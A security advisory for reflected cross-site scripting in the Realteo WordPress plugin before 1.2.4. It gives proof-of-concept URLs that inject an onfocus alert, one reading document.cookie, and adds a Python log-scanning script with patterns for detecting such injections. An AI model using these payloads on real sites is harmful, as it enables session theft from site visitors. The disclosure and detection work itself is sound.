
Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius, _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22



https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22 
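
Detection

An added example, not part of the original advisory or the plugin's code: a log triage script that flags requests where any of the four parameters named above carries markup-breaking characters or an inline event-handler attribute. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory names as reflected without sanitisation.
REFLECTED_PARAMS = ("keyword_search", "search_radius", "_bedrooms", "_bathrooms")
# Characters that close an attribute value or tag, and an inline event-handler attribute.
BREAKOUT = re.compile(r'["<>]')
HANDLER = re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE)
# Request field of a combined-format access log line (log format is an assumption).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; line 2 reuses the first proof-of-concept URL above.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2021:10:00:00 +0000] "GET /properties/?keyword_search=loft&search_radius=25&_bedrooms=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22 HTTP/1.1" 200 5316',
    '203.0.113.7 - - [01/Jan/2021:10:00:09 +0000] "GET /properties/?s=%22quoted%22&_bathrooms=1 HTTP/1.1" 200 5120',
]

def suspicious_params(target):
    """Return {param: [reasons]} for reflected parameters whose decoded value looks like markup."""
    findings = {}
    query = urlsplit(target).query
    # parse_qs percent-decodes values, so encoded quotes and brackets are seen as-is.
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in REFLECTED_PARAMS:
            continue  # other parameters are outside this advisory's scope
        for value in values:
            reasons = []
            if BREAKOUT.search(value):
                reasons.append("markup-breakout-char")
            if HANDLER.search(value):
                reasons.append("event-handler-attr")
            if reasons:
                findings[name] = reasons
    return findings

def scan(lines):
    """Return [(line_number, findings)] for log lines with at least one flagged parameter."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        found = suspicious_params(match.group(1)) if match else {}
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(f"line {number}: {found}")
```

Hits are triage leads on sites still running a Realteo version below 1.2.4; a hit does not by itself show that a victim's browser executed anything.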